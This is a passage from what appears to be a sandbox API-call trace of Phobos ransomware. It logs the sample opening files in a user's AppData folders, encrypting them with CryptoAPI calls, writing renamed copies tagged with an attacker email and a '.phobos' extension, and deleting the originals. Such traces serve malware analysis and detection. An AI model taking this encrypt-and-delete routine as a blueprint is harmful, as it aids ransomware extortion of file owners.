"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.959] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3256) returned 1 [0167.959] CloseHandle (hObject=0x180) returned 1 [0167.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db")) returned 0x2020 [0167.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.959] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.960] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=24) returned 1 [0167.960] CloseHandle (hObject=0x180) returned 1 [0167.960] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db")) returned 0x2020 [0167.960] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.960] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.962] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0167.962] CloseHandle (hObject=0x180) returned 1 [0167.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini")) returned 0x2026 [0167.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.962] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.962] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0167.963] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.963] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0167.964] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0167.964] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0167.965] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0167.965] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.965] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0167.965] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.965] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0167.965] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0167.965] CloseHandle (hObject=0x180) returned 1 [0167.965] CloseHandle (hObject=0x190) returned 1 [0167.965] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\desktop.ini")) returned 1 [0167.966] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.968] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0167.968] CloseHandle (hObject=0x190) returned 1 [0167.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini")) returned 0x2026 [0167.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.969] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.969] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0167.969] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.969] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0167.970] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0167.970] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0167.971] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0167.971] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.971] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0167.971] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.971] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0167.971] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0167.971] CloseHandle (hObject=0x190) returned 1 [0167.971] CloseHandle (hObject=0x180) returned 1 [0167.972] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini")) returned 1 [0167.972] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.973] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=65536) returned 1 [0167.973] CloseHandle (hObject=0x180) returned 1 [0167.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")) returned 0x2026 [0167.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.974] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.974] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.974] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0167.974] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.974] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10000, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10010, dwBufLen=0x10010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10010) returned 1 [0168.060] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10010, lpOverlapped=0x0) returned 1 [0168.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0168.061] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.062] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.062] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.062] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.062] CloseHandle (hObject=0x180) returned 1 [0168.062] CloseHandle (hObject=0x190) returned 1 [0168.062] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")) returned 1 [0168.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.063] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0168.063] CloseHandle (hObject=0x190) returned 1 [0168.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini")) returned 0x2006 [0168.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.064] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.064] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0168.065] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0168.066] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0168.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0168.066] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.067] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.067] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.067] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.067] CloseHandle (hObject=0x190) returned 1 [0168.067] CloseHandle (hObject=0x180) returned 1 [0168.067] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\desktop.ini")) returned 1 [0168.068] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.068] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0168.068] CloseHandle (hObject=0x180) returned 1 [0168.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini")) returned 0x2006 [0168.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.068] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.068] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 